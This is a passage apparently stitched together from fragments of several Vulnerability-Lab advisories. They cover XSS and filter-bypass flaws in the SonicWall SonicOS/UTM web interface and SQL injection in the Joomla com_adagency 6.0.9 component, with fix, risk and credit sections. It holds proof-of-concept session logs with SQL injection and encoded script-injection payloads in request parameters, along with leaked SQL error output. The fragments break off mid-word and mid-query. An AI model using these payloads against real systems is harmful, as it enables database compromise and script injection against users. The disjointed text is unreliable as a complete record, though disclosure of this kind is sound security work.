The vulnerability can be patched by parsing and encoding the vulnerable `Host Name / IP Address`, `Client Name/IP Address` and `Proxy Forward To` input fields. Encode the values `ldapServerBindName - usrTreesSel - ldapUsrsTree_1` and `svcObjId` to prevent an inject via POST method. Restrict the input fields and disallow the usage of special chars. In the last step, encode the output listing locations in the `SSO Agents`, `Terminal Services Agent Settings` and `RADIUS Accounting Single-Sign-On` modules to prevent the execution points of the vulnerabilities. Adjust the filter procedure and set up a more secure exception handling that intervenes on an invalid execution or unhandled exception.

Note: All the security issues are marked as resolved by Dell SonicWall with several updates until 2017 Q4.

Security Risk:
===
The security risk of the application-side input validation web vulnerability and the filter bypass issue is estimated as medium (CVSS 4.5).

Credits & Authors:
===
Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Be
iJoomla com_adagency 6.0.9 - SQL Injection Vulnerabilities
UTER JOIN #__users as user on user.id=advertis.user_id LEFT JOIN #__ad_agency_campaign as c on c.aid=advertis.aid WHERE 1=1 AND user.id<>'' AND advertis.approved LIKE '%-1'Y%' GROUP BY advertis.aid ORDER BY advertis.ordering ASC
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Y-1'' AND cb.`campaign_id`=3 GROUP BY b.id ORDE' at line 15 SQL=SELECT b . * , camp.id campaign_id, camp.name campaign_name, a.aid AS advertiser_id2, a.company AS advertiser, concat( width, 'x', height ) AS size_type, m.id mid, m.title zone_name FROM #__ad_agency_banners AS b LEFT OUTER JOIN #__ad_agency_advertis AS a ON b.advertiser_id = a.aid LEFT JOIN #__ad_agency_campaign_banner AS cb ON cb.banner_id = b.id LEFT JOIN #__ad_agency_campaign AS camp ON camp.id = cb.campaign_id LEFT JOIN #__ad_agency_order_type AS p ON camp.otid = p.tid LEFT JOIN #__modules AS m ON m.id = cb.zone WHERE 1=1 AND b.approved = 'Y-1'' AND cb.`campaign_id`=3 GROUP BY b.id ORDER BY b.ordering ASC , b.id DESC LIMIT 0,30

--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://joomla.localhost:8080/index.php?option=com_adagency=adagencyAds_select=Y-1%27[SQL-INJECTION VULNERABILITY!]**_id=3
Mime Type[text/html]
Request Header:
Host[joomla.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0] Cookie[dacce502d8fa40f12fdba764da41b8cf=8uusag3vgk0544u8phf9c4oa11; currentURI=http%3A%2F%2Fjoomla.localhost:8080%2F; em_cdn_uid=t%3D1471798050244%26u%3D11f009a55e864578928adec2c70fa876; 350a4e86045327a856d5c0333a428604=ukf6ldgrs5ekdrukh8p8s422k0; activeProfile=0] Connection[keep-alive] Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache] X-Powered-By[PHP/7.0.9] P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET http://joomla.localhost:8080/index.php?option=com_adagency=adagencyAdvertisers_status=-1%27Y[SQL-INJECTION VULNERABILITY!]**
Mime Type[text/html]
Request Header:
Host[joomla.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Cookie[jsju=0; dacce502d8fa40f12fdba764da41b8cf=8uusag3vgk0544u8phf9c4oa11; currentURI=http%3A%2F%2Fjoomla.localhost:8080%2F; em_cdn_uid=t%3D1471798050244%26u%3D11f009a55e864578928adec2c70fa876; 350a4e86045327a856d5c0333a428604=ivi4d2j9782af9h0kntmqi6m43; activeProfile=0] Connection[keep-alive] Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache] X-Powered-By[PHP/7.0.9] P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8]

Reference(s):
http://joomla.localhost:8080/
http://joomla.localhost:8080/index.php
http://joomla.localhost:8080/index.php?option=
http://joomla.localhost:8080/index.php?option=com_adagency
http://joomla.localhost:8080/index.php?option=com_adagency=adagencyAdvertisers
http://joomla.localhost:8080/index.php?option=com_adagency=adagencyAdvertisers_status
http://joomla.localhost:8080/administrator/index.php?option=com_adagency=adagencyAdvertisers_status

Solution - Fix & Patch:
===
The vulnerability can be patched by a secure parse and restriction of the vulnerable `advertiser_status` and `status_select` parameters in the com_adagency component. Disallow the usage of special chars, escape the entries and use a prepared statement to prevent exploitation of the vulnerabilities.

Note: The vulnerability has been resolved in the last com_adagency component updates in 2017 Q1-4.

Security Risk:
===
The security risk of the remote SQL injection web vulnerabilities in the com_adagency 6.0.9 Joomla component is estimated as high (CVSS 7.1).

Credits & Authors:
===
Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
SonicWall SonicOS NSA UTM Firewall - Bypass & Persistent Vulnerability
22%26lt%3Bimg+src%3D%22x%22%26gt%3B%2520%2520%26gt%3B%22%26lt%3Biframe+src%3Da%26gt%3B%2520%26lt%3Biframe%26gt%3B] refresh_page[securityServicesCFView.html] tableIndex[-1] cgiaction[%5Bobject+Window%5D]

--- PoC Session Logs (POST) [Inject] #2 ---
Status: pending[]
POST https://utm_waf.sonicwall.localhost:8351/main.cgi
Mime Type[unknown]
Request Header:
Host[utm_waf.sonicwall.localhost:8351] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html]
Cookie[curUrl=gavSummary.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0; 2039=local; 2040=%7B%22refreshTime%22%3A3%2C%22 showTimeRange%22%3A10%2C%22refreshEnable%22%3Atrue%2C %22viewApplications%22%3A1%2C%22viewBandwidth%22%3A1%2C%22viewPktRate%22%3A1%2C%22viewPktSize%22%3A1%2C%22 viewConnRate%22%3A1%2C%22viewConnCount%22%3A1%2C%22viewCoreMonitor%22%3A1%2C%22displayBandwidth%22%3A%22bwSelRate%22%2C %22displayPktRate%22%3A%22pktRateSelRate%22%2C%22displayPktSize%22%3A%22pktSizeSelRate%22%2C%22displayConnRate%22%3A%22 connRateSelRate%22%2C%22displayConnCount%22%3A%22connCountSelCount%22%2C%22ipVerBandwidth%22%3A%222%22%2C %22ipVerApps%22%3A%222%22%2C%22showMostFrequentApps%22%3Afalse%2C%22inChartAppLegends%22%3Afalse%2C%22hideAppLegends%22%3Atrue%2C%22inChartBwLegends %22%3Afalse%2C%22hideBwLegends%22%3Atrue%2C%22hidePktRateLegends%22%3Atrue%2C %22hidePktSizeLegends%22%3Atrue%2C%22hideConnRateLegends%22%3Atrue%2C%22hideConnCountLegends%22%3Atrue%2C%22hideAppChart%22%3Afalse%2C%22hideBwChart %22%3Afalse%2C%22hidePktRateChart%22%3Afalse%2C%22hidePktSizeChart%22%3Afalse%2C %22hideConnRateChart%22%3Afalse%2C%22hideConnCountChart%22%3Afalse%2C%22hideCoreMonChart%22%3Afalse%2C%22hideMemoryMonChart%22%3Afalse%2C%22rtAppColors %22%3A%5B%22%23081D58%22%2C%22%23253494%22%2C%22%23225EA8%22%2C%22%231D91C0%22%2C %22%2341B6C4%22%2C%22%237FCDBB%22%2C%22%23C7E9B4%22%2C%22%23EDF8B1%22%2C%22%23D9%22%5D%2C%22rtDataColors %22%3A%5B%22%23E41A1C%22%2C%22%23377EB8%22%2C%22%234DAF4A%22%2C%22%23984EA3%22%2C%22%23FF7F00%22%2C%22%2333%22%2C %22%23A65628%22%2C%22%23F781BF%22%2C%22%2399%22%2C%22%235A6B34%22%2C%22%23F0D64E%22%2C%22%23D7B740%22%2C%22%23AB80 24%22%2C%22%23925818%22%2C%22%23DB5A6E%22%2C%22%23071D69%22%2C%22%230A1650%22%2C%22%234571DA%22%2C%22%23E18B5C%22%2C %22%23028482%22%2C%22%237ABA7A%22%2C%22%23B76EB8%22%5D%2C%22useGradient%22%3Atrue%7D]
POST-Daten:
csrfToken[???] inputbox[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E] list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E] gav_cloud_exclude_list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E] gav_cloud_refresh_exclusions[] refresh_page[gav_cloud.html] isobject[1] cgiaction[%5Bobject+Window%5D]

Reference(s):
https://utm_waf.sonicwall.localhost:8351/main.cgi
https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html
https://utm_waf.sonicwall.localhost:8351/addTrustedDomainDlg.html

Solution - Fix & Patch:
===
The vulnerability can be patched by setting up a secure validation for the update inputbox save procedure, the same validation that is already applied in the add procedure. Encode the content and disallow the usage of special chars in the item list when processing an add. Parse the content and filter the input before the permanent save that finally displays the content in the main item list, to prevent an application-side script code execution.

Note: The vulnerabilities have been reported to the Dell security team. The issue has been resolved between 2016 Q4 and 2017 Q4 by the SonicWall developers.

Security Risk:
===
The security risk of the application-side input validation web vulnerability and the filter bypass issue is estimated as medium (CVSS 4.5).

Credits & Authors:
===
Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.